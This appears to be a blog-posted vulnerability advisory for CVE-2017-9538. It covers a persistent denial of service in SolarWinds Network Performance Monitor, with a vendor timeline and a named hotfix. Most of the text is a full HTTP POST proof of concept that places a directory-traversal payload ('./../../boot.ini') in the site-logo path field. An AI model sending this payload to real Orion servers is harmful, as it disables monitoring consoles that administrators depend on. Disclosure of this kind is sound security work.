2017 m. spalio 5 d., ketvirtadienis
[CVE-2017-9538] Persistent Application Denial of Service
-------------------------------------------------------------
Vulnerability type: Persistent Application Denial of Service
-------------------------------------------------------------
Credit: Andy Tan
CVE ID: CVE-2017-9538
-----------------------------------------------
Product: SolarWinds Network Performance Monitor
-----------------------------------------------
Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier
Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1
Description: An attacker has to inject an arbitrary payload e.g. ../../../boot.ini into the vulnerable field. After successful submission, the entire web application will encounter an error message displaying 'Unexpected Website Error, Cannot use a leading .. to exit above the top directory'. In other words, the denial of service is caused by an incorrect implementation of a directory-traversal protection mechanism. Restarting the service and the entire server itself does not resolve this issue.
Affected URL: https:///Orion/Admin/Settings.aspx
Navigation: Settings -> Web Console Settings -> Site Logo -> Upload logo from external path
Affected parameter: ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoPath
================
Proof of Concept
================
POST /Orion/Admin/Settings.aspx HTTP/1.1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__AntiXsrfTokenInput"
b752b8b9beec4c46ab90559cfcd2bc01
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00_ctl00_ctl00_BodyContent_ContentPlaceHolder1_adminContentPlaceholder_fileUploadImage_ClientState"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__EVENTTARGET"
ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$imgbtnSubmit
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__EVENTARGUMENT"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00_ctl00_ctl00_BodyContent_ContentPlaceHolder1_adminContentPlaceholder_fileUploadImageNoc_ClientState"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__VIEWSTATE"
/wEPDwUJNzUxMTg4OTYyDxYCHhNWYWxpZGF0ZVJlcXVlc3RNb2RlAgEWAmYPZBYCZg9kFgJmDw8WBB4PX19BbnRpWHNyZlRva2VuBSBiNzUyYjhiOWJlZWM0YzQ2YWI5MDU1OWNmY2QyYmMwMR4SX19BbnRpWHNyZlVzZXJOYW1lBQZhZG1pbjFkFgICBA9kFgICAQ9kFgICBA8WBB4FY2xhc3MFDnN3LWFwcC1yZWdpb24gHgdlbmN0eXBlBRNtdWx0aXBhcnQvZm9ybS1kYXRhFgICBQ9kFgICAQ9kFjYCAg8PFgQeCENzc0NsYXNzBRYgc3ctYnRuLXByaW1hcnkgc3ctYnRuHgRfIVNCAgIWAh4KYXV0b21hdGlvbgUWRG93bmxvYWQgaW5zdGFsbGVyIG5vd2QCBBAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCBRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCBhAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCCRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCChAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCDA8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7FgYCAQ9kFgICAQ9kFgJmDxYEHgJpZAVfY3RsMDBfY3RsMDBfY3RsMDBfQm9keUNvbnRlbnRfQ29udGVudFBsYWNlSG9sZGVyMV9hZG1pbkNvbnRlbnRQbGFjZWhvbGRlcl9maWxlVXBsb2FkSW1hZ2VfY3RsMDIfCAUMd2lkdGg6MzU1cHg7ZAICDw8WBB8FBSN4LWZvcm0tZmlsZS1idG4gc3ctYnRuLXNtYWxsIHN3LWJ0bh8GAgIWAh8HBQZCcm93c2VkAgQQDxYEHwUFE3N3LXZhbGlkYXRpb24tZX
Jyb3IfBgICZGRkAg4PFgIfCAUOZGlzcGxheTpibG9jazsWAgIFEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIQDxYCHwgFDmRpc3BsYXk6YmxvY2s7FgYCAQ9kFgICAQ9kFgJmDxYEHwkFYmN0bDAwX2N0bDAwX2N0bDAwX0JvZHlDb250ZW50X0NvbnRlbnRQbGFjZUhvbGRlcjFfYWRtaW5Db250ZW50UGxhY2Vob2xkZXJfZmlsZVVwbG9hZEltYWdlTm9jX2N0bDAyHwgFDHdpZHRoOjM1NXB4O2QCAg8PFgQfBQUjeC1mb3JtLWZpbGUtYnRuIHN3LWJ0bi1zbWFsbCBzdy1idG4fBgICFgIfBwUGQnJvd3NlZAIEEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAISDxYCHwgFDmRpc3BsYXk6YmxvY2s7FgICBRAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCFBAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCFhAPFgQfBQUTc3ctdmFsaWRhdGlvbi1lcnJvch8GAgJkZGQCGA8QZBAVAxFTaG93IFdvcnN0IFN0YXR1cyNTaG93IFdvcnN0IFN0YXR1cyAoSW50ZXJmYWNlcyBvbmx5KRVTaG93IG9ubHkgSUNNUCBTdGF0dXMVAwEqFE9yaW9uLk5QTS5JbnRlcmZhY2VzABQrAwNnZ2dkZAIZDxYCHgRUZXh0Bb4BV2hlbiBzaG93aW5nIHRoZSBzdGF0dXMgb2YgYW55IHNpbmdsZSBub2RlIG9uIHRoZSBub2RlIHRyZWUgb3Igb24gYSBtYXAsPGJyIC8+eW91IGNhbiBzaG93IHRoZSBzdGF0dXMgb2YgdGhlIG5vZGUgYW5kIGl0cyBjaGlsZHJlbiwgbm9kZSBzdGF0dXMgYW5
kIGludGVyZmFjZXMsPGJyIC8+b3IganVzdCBub2RlIElDTVAgc3RhdHVzLmQ!
CHA8WAh8
KBVJQcm92aWRlIGlubGluZSBoaW50cyBmb3IgaW50ZWdyYXRpbmcgeW91ciBjdXJyZW50bHkgaW5zdGFsbGVkIFNvbGFyV2luZHMgcHJvZHVjdHMuZAIgEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIhEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIjEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIkEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAImEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAInEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIpEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIqEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIrEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIxEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIyEA8WBB8FBRNzdy12YWxpZGF0aW9uLWVycm9yHwYCAmRkZAIzDw8WBh8KBQZTdWJtaXQfBQUWIHN3LWJ0bi1wcmltYXJ5IHN3LWJ0bh8GAgIWAh8HBQZTdWJtaXRkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYKBVBjdGwwMCRjdGwwMCRjdGwwMCRCb2R5Q29udGVudCRDb250ZW50UGxhY2VIb2xkZXIxJGFkbWluQ29udGVudFBsYWNlaG9sZGVyJGxvZ29DYgVZY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRmaWxlVXBsb
2FkSW1hZ2UFV2N0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkbG9nb0Zyb21VcmxDYgVTY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRub2NMb2dvQ2IFXGN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkZmlsZVVwbG9hZEltYWdlTm9jBVpjdGwwMCRjdGwwMCRjdGwwMCRCb2R5Q29udGVudCRDb250ZW50UGxhY2VIb2xkZXIxJGFkbWluQ29udGVudFBsYWNlaG9sZGVyJG5vY0xvZ29Gcm9tVXJsQ2IFWmN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JBdWRpdGluZ1RyYWlscwViY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkQ29udGVudFBsYWNlSG9sZGVyMSRhZG1pbkNvbnRlbnRQbGFjZWhvbGRlciRjaGJTaG93RGF0YVBvaW50c09uTGluZXMFW2N0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JOb3RpZnlSZW1vdmFibGUFYGN0bDAwJGN0bDAwJGN0bDAwJEJvZHlDb250ZW50JENvbnRlbnRQbGFjZUhvbGRlcjEkYWRtaW5Db250ZW50UGxhY2Vob2xkZXIkY2JBdXRvbWF0aWNHZW
9sb2NhdGlvbgUuY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkY3RsMD!
AkTG9naW
5WaWV3MQ8PZAIBZAUuY3RsMDAkY3RsMDAkY3RsMDAkQm9keUNvbnRlbnQkY3RsMDAkTG9naW5WaWV3Mg8PZAIBZBC54iMHZwWuUrSOCyy3YhYFyEN1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
8442CAB0
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbSessionTimeout"
25
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlWindowsAccountLogin"
False
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbAutoRefresh"
5
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoCb"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImage$ctl00"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImage$ctl02"; filename=""
Content-Type: application/octet-stream
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoFromUrlCb"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$logoPath"
./../../boot.ini
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$nocLogoCb"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImageNoc$ctl00"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$fileUploadImageNoc$ctl02"; filename=""
Content-Type: application/octet-stream
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$nocLogoPath"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbSiteLoginText"
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbHelpServer"
http://www.SolarWinds.com
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlRollupWorstStatus"
False
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlNodeChildStatusParticipationRule"
*
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlNodeChildStatusDisplayMode"
NoBlink
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlTipsIntegration"
1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$cbDragAndDropResources"
1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$cbAuditingTrails"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbChartAspect"
0.620000004768372
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbThumbnailAspect"
0.600000023841858
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbPercentile"
95
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbMaximumSeries"
10
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$chbShowDataPointsOnLines"
on
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$ddlFontSize"
1
-----------------------------180072296016649028841705926975
Content-Disposition: form-data; name="ctl00$ctl00$ctl00$BodyContent$ContentPlaceHolder1$adminContentPlaceholder$tbAutoRefreshActiveAlerts"
1
-----------------------------180072296016649028841705926975--
------------------------
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone.
2017-08-22: Contacted vendor again.
2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3
2017-09-28: Contacted vendor again.
2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3
2017-09-29: Public disclosure.
Užsisakykite:
Rašyti komentarus (Atom)
Komentarų nėra:
Rašyti komentarą